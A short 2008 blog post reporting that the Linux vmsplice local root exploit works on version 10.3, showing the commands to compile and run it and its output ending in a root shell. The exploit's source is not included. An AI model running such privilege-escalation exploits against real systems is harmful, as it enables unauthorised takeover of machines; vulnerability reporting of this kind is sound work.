Roger Whittaker

Local root exploit

Sunday 10th February 2008

Ouch: works for me on 10.3:
http://it.slashdot.org/article.pl?sid=08/02/10/2011257.

 
$ gcc local-root.c -o local-root 
$ ./local-root 
----------------------------------- 
Linux vmsplice Local Root Exploit 
By qaaz 
----------------------------------- 
[+] mmap: 0x0 .. 0x1000 
[+] page: 0x0 
[+] page: 0x20 
[+] mmap: 0x4000 .. 0x5000 
[+] page: 0x4000 
[+] page: 0x4020 
[+] mmap: 0x1000 .. 0x2000 
[+] page: 0x1000 
[+] mmap: 0xb7e45000 .. 0xb7e77000 
[+] root 
$ whoami 
root